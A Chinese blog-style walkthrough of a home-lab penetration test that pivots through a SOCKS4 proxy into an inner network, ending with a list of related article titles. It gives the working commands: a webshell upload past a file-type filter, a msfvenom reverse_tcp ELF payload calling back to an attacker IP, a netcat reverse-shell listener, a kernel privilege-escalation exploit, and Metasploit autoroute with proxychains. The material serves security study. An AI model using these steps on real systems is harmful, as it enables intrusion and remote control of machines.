socks4代理网络渗透测试实验
实验目的:利用代理功能对2层网络进行渗透测试靶机 ubantu 192.168.31.207 192.168.1.129ubantu 192.168.1.100
首先访问192.168.31.207
一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将
改为
放包就上传成功了
菜刀连接文件地址
kali打开msf控制台,设置模块exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.43
set LPORT 8888
利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf
利用菜刀上传php大马,并将生成的elf木马上传到目标机
进入大马进行反弹shell提权
kali本地监听12388端口 nc -lvvp 12388
大马进行反弹shell
反弹成功
uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本
gcc shell.c -o shell
./shell
提权成功
我们给上传的elf木马权限并执行
chmod 777 1.elf
./elf
成功获得一个会话连接
添加一个路由 run autoroute -s 192.168.1.0/24
本地设置socks4代理
use auxiliary/server/socks4a
set SRVPORT 9999
开启新的终端 编辑 vim /etc/proxychains.conf
将设置的socks4添加进末尾
代理打开firefox
访问192.168.1.100
弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3
添加新文章上传php大马
直接拖拽成功上传后,可以查看路径,直接访问地址
由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了
以上操作仅供大家学习参考使用,
socks4代理网络渗透测试实验相关推荐
- 网络渗透测试实验三 XSS和SQL
网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...
- 网络渗透测试实验三——XSS和SQL注入
网络渗透测试实验三--XSS和SQL注入 实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计 ...
- 三层网络渗透测试实验
前言 在渗透测试过程中我们会遇到很多不同的网络情况,或许普通的内网渗透我们已经很熟练了,但在现实环境中或许会有多层网络结构,如果遇到多层网络结构我们应该如何进行渗透呢? 利用这个实验我们就可以更清晰的 ...
- 网络渗透测试实验二(网络扫描与网络侦察)
实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 系统环境:Kali Linux 2.Windows 网 ...
- 网络渗透测试实验一 网络扫描与网络侦查
实验目的 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 实验内容.原理 一.被动扫描 1.搜索麻省理工学院网站 ...
- GUET网络渗透测试实验报告1
1.实验目的 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 2. 实验内容.原理 3. 实验过程 1.用搜索引 ...
- 网络渗透测试实验一 网络扫描与网络侦察
目录 一.实验目的和要求 二.实验步骤 三.实验小结 一.实验目的和要求 实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步 ...
- 网络渗透测试实验——网络扫描与网络侦察
目录 1. 实验目的和要求 2. 实验步骤 3. 实验小结 实验目的和要求 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为 ...
- (超详细)XSS和SQL注入-网络渗透测试实验三
文章目录 前言 实验目的 系统环境 网络环境 实验工具 XSS部分:利用Beef劫持被攻击者客户端浏览器. 实验环境搭建. 环境搭建参考网站 搭建IIS时踩的坑: 1.利用AWVS扫描留言簿网站,发现 ...
最新文章
- 嵌入式jetty的HTTP实现
- centos 6.5 安装 lamp 后mysql不能启动_CentOS 6.5系统安装配置LAMP(Apache+PHP5+MySQL)服务器环境...
- 减负提质的新命题下,网易云信如何为课后服务升级?
- python前端界面模板_Python编程flask使用页面模版的方法
- eclipse各个版本的区别
- Project: 项目经理新建资源预订
- git 如何删除缓存的远程分支列表
- Excle 常用函数
- karto探秘之open_karto 第一章 --- 数据结构与类的初始化
- JSON与对象之间的相互转换
- NVIDIA史上最大显卡质量事故,我正在用Vostro 1400
- 基于FPGA卡拉ok系统的设计--反馈抑制
- 焦点关注|创造中国奇迹:北京大兴国际机场的助力者
- Bugku-web-秋名山老司机
- 在vue中使用three.js创建一个简单的立体图形
- 小伙创业做奶茶,兢兢业业把奶茶店已经扩张到了10家分店
- flink 缓存问题处理过程,看我十八般武艺
- 如何更换荣耀MagicBook Pro开机启动logo
- win7怎么进入安全模式_win7进入安全模式教程
- html文件右键没有打开方式,Win7右键菜单中的”打开方式“不见了的解决方法
热门文章
- 修改ssh默认登录shell
- Linux下部署启动项目
- Barlow Twins:Self-Supervised Learning via Redundancy Reduction论文阅读
- 最新小白设置sublime默认浏览器以及快捷键
- .NET 学习-未将对象引用设置到对象的实例 解决方法
- ios 代码设置控件宽高比_IOS开发入门之iOS一套代码适配所有iPhone手机布局实现方案...
- google云端硬盘colab
- 电脑突然变成绿屏错误代码无法使用怎么办?
- 笔记本电脑开机,连着wifi无法上网的解决办法
- 乐鑫Esp32学习之旅16 学习本地语音唤醒离线识别框架 esp-skainet ,如何修改唤醒词? 如何自定义命令词?如何做意图动作?